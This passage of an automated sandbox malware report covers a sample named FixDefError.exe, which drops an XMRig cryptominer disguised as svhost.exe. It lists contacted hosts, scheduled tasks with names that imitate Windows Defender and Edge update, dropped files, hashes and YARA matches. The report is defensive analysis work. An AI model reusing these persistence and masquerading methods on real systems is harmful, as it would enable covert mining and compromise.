                                                                                                  http://www.sandoll.co.krFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://apis.google.comProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deFixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.sakkal.comFixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.com/designerssProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sandoll.co.kreVFixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.agfamonotype.FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.tiro.comuFixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://xmrig.com/wizard%ssvhost.exe.1.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.fontbureau.com/designers/frere-jones.ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.urwpp.deFFixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  149.154.167.220
                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                  142.251.209.36
                                                                                                                  		www.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  104.237.62.211
                                                                                                                  		api4.ipify.orgUnited States
                                                                                                                  		18450WEBNXUSfalse
                                                                                                                  198.251.88.130
                                                                                                                  		rentry.coUnited States
                                                                                                                  		53667PONYNETUSfalse
                                                                                                                  140.82.121.3
                                                                                                                  		github.comUnited States
                                                                                                                  		36459GITHUBUSfalse
                                                                                                                  185.199.111.133
                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                  		54113FASTLYUSfalse

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                                                                  Analysis ID:829697
                                                                                                                  Start date and time:2023-03-19 00:16:08 +01:00
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 10m 41s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:light
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Number of analysed new started processes analysed:77
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample file name:FixDefError.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  HDC Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 95%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 0
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe
                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, pool.hashvault.pro
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  00:17:17Task SchedulerRun new task: AntiMalwareServiceExecutable path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: MicrosoftEdgeUpd path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: RuntimeBroker path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:17Task SchedulerRun new task: SecurityHealthSystray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:18Task SchedulerRun new task: WindowsDefender path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:18Task SchedulerRun new task: WmiPrvSE path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:22Task SchedulerRun new task: ActivationRuntime path: C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                  00:17:22Task SchedulerRun new task: NvStray path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:22API Interceptor2x Sleep call for process: ProgramStarter.exe modified
                                                                                                                  00:17:23Task SchedulerRun new task: OneDriveService path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: Agent Activation RuntimeServices_bk903 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: AntiMalwareSericeExecutableServices_bk64 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: MicrosoftUpdateServicesServices_bk620 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:23Task SchedulerRun new task: SettingSysHostServices_bk248 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:24Task SchedulerRun new task: WindowsDefenderServicesServices_bk697 path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:17:26Task SchedulerRun new task: ActivationRule path: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                                                                                                                  00:18:25API Interceptor23x Sleep call for process: powershell.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASNs

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\MicrosoftSystemCache\clib.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1904
                                                                                                                  Entropy (8bit):6.026358237126419
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:e/1cqvurjwu2uNtmRuxh0M2pMoE8Vjcp4D77XURG1BZJrM5i:eTcIuNbb0ZpM4D7OG11M5i
                                                                                                                  MD5:429780A397E429FCA432914867ED1CDC
                                                                                                                  SHA1:0BE35D51901BEE31664CBA07D643055E007D4D22
                                                                                                                  SHA-256:74F2DD790ED25DF1BCA9B0071D51D03BB118BD968612061219EBF3CE768BF67C
                                                                                                                  SHA-512:36DC70A756D3F38243E7DDC9AB387E607C419E769F7BFD7AB0FDC60E555B2174FE0C2CAB2F9F74A160FCD24E95AC62930AD5000715AAD2FF90EAB76FD5361A44
                                                                                                                  Malicious:false
                                                                                                                  Preview:P2YPPhDz2KgW0IVwLRnW4qt3YuF6x8NZ5xoXmqmz37FCoxjTHWkt+X3+y2oVWO04wLu5EhroPNIzgcjocysWxC3R4RYw3AoWtHLuHtRwr9Ph2lOJO/3iQ5XHPgFJA78H1eNdfbDu6wCPXQse9EPll90YNDJ8crZ3BASPTapcn80vo34lxgXydo0=..GrbpRTtne0IhO3CfL0pztj/WolibZidFhI+u9T/g7MWgnAplx87A9nyGZwJSZuvFUh3EgbzP/8hArtvEHY37f7MeWLDqg7FsOUlCs1ZlzP23UTZ1RemyYnROaDZUTYNf0R8nP4z7uoLtuydhMibd0LfUqgkpiTJs5p9e5dMhkjbkmFmqlnxQz1I=..N6XCeEdl9HDadAeTv8qCG8X5sxfVzinG2elN7Xl3RAWbKJ/Ch4L4H+hG56JWby3uk7aYqdDSdoQHCCRsderJvz3TZMPH1f3LEHivhE1xCIWKn8QD6SQsAQXNY/543dduSeNCnniFm8LUkTCLshLYJyToVtNA+8H2b5MJFjzqTXEsb0U16cFVQ1I=..RhSnZTLVfydTWog1a6UAy9nkDPUkAmhdXIzDitiGNsUoT84yyxEWOpfY6QFQkHpM9LpzclftvuzWf0UsjRMm6xK4LB5R2G/faa2D95nAAE5xoO5ONN9X/xNjYcjE2GKHwz7N6Hml496JXt7SN4MiUHK5FfcybKQETJM44PFiv2dtAYM+XQoIURc=..W9h1WsdZtRbTm+5qrKodGvUxMbCWotRQGLtUsyCo/ydg5wvQzLR5Y+QzsY3pWc3DPru1y5Dbf1IGlF/hnZ7TdOWnXSvaerRfQQqjE26ByT5kGEhs59/PibkZir3cACuh57Jm2ye2ZWANmjj4NBvj5dmPOd8UyZDPqFxgZ/xr4VL0qG+gkEjj0u4=..ubvyG4W8YbIKOpv1itsiGVW9EzUEamCyM6rU5KEZZdac/zXp4WSNWjFNu3xv6no96lusaS

                                                                                                                  C:\ProgramData\MicrosoftSystemCache\mib.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                  C:\ProgramData\RuntimeBrokerData\RegSvc.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):88064
                                                                                                                  Entropy (8bit):6.229523170202207
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:bJYuREHvD7cJ/kXCUJaOXIz8o+ZdH+Qij6Tiz:lrRyJwQo+ZdH+hj6mz
                                                                                                                  MD5:BFD02E7E401667B6C5853FE0FBEC26E7
                                                                                                                  SHA1:F257EBD2D6975C8B98536D3CA46A188BD50CBD09
                                                                                                                  SHA-256:030EC5352DE04F4773F5EB701E1506D3A97B948BC8BB9CF817F479D5A4E765DA
                                                                                                                  SHA-512:DB355DE9D1AA0C2DD5459253214F8634EA932D213706608827174B311DF718BFD5378898C4D3B4CEC0CCDCD0F90517931B5F977898DC9AD0B56E775C7B9F96A3
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}..........."...0..>...........\... ...`....@.. ....................................`..................................\..O....`..............................T\............................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............V..............@..B.................\......H..........................p...........................................~.L..sl.!.A.&.AI.F*.j..c......S...y.....D/..c&........'.<L..n!.\N....)........JR.=.0X..).....qx.Y,~o......k.....Tk0...[..D}.PK...3...........<.%1:<-....|.S.O.-.-9y......pN3|..@...B'....b.n........R.6h.o+..YM.UJ.........MUu5.aO.....5...#.\.t. ~B...q1..U...;~'._s...;8.g..2*..!.F..1....r.E..k(.\...@>sK.C...%....hu.....6Z..).;..x+.....j.z'.S.G.u....T.L@.{.4.5..k...K.$g4.u.o&D7Q..#..N..F4"...

                                                                                                                  C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):154112
                                                                                                                  Entropy (8bit):6.466751742009968
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:F5biAfx1p7t+KJPF0+yxqbl8MBRnZgRKByWu:F5biAfx1l6vxqbqMBRnZgRKBy
                                                                                                                  MD5:DC68A4B4746C67F3D28C9FD958E8EA05
                                                                                                                  SHA1:4E3C8AB2D91FD9831731483B192FFAED142430A3
                                                                                                                  SHA-256:A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
                                                                                                                  SHA-512:4E6D94C3AE09B567EF76BAA392C1E6E0F12615F46CCB9A2116DB7B4B2D304C03E510BAACA03738F540A4E85A0310D69B57A884B98AFCAA8D62E0A3C90F32E832
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%/..........."...0..N...........l... ........@.. ....................................`.................................Tl..W....................................l............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B.................l......H.......\o...............m..p............................................se7..%.f.fU..h...=k.);....jhE..^.6....W0/.,.CqM..8..]LB..(..$.$...8.Z..IXW.a.a....Q...M......92*.<.V..8Zc.z.5.E.&.x.o.,>..JV.o.....mctp..39../~h.....ca....o>../x...b..4.-YP....R......} .G....*>..M..e..C"d.GL..$.=...}.w.l.9.G.n.a/...t..y)..}<k.!)g...Y.y@K.'4..\u....%i.e...I.......5.z.w.RM....h.j..8|}W#d.........1%U.hbU.=-p.?..Bxz...)..u..Y=F....m...?...s%.k.7[..z.}..9X......Iu...5...la

                                                                                                                  C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14544
                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\RuntimeBrokerData\svhost.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8294400
                                                                                                                  Entropy (8bit):6.635462046124321
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:GeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zJ:NflEiI9Wt3YLkqpnmNK/ysxfWdIjF
                                                                                                                  MD5:B38D28CCCACAC85A62AEF15D993449DD
                                                                                                                  SHA1:F65D87F2185AD06E1057842B49C2E9F897D37CF9
                                                                                                                  SHA-256:DA528001CA247AABB5D6ED30187E3F85661663C3B00B3BC85A932CD2066251BB
                                                                                                                  SHA-512:836C6F59EEA640A9355AD7066A2F810437C7CAA6D429575F66245D756B0058AA43976478FF2000366D034BC1D2E2E256927E82F0EEB738E795DB62393C130620
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: ditekSHen
                                                                                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~................@...................................F9....`... .................................................E...P........w..............`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                                                                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):1.0712517987358952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                  MD5:6941A631A897376575E236889F046FBF
                                                                                                                  SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                  SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                  SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                  Malicious:false
                                                                                                                  Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration_Temp.1.etl

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):1.0712517987358952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                  MD5:6941A631A897376575E236889F046FBF
                                                                                                                  SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                  SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                  SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                  Malicious:false
                                                                                                                  Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1119
                                                                                                                  Entropy (8bit):5.356708753875314
                                                                                                                  Encrypted:false
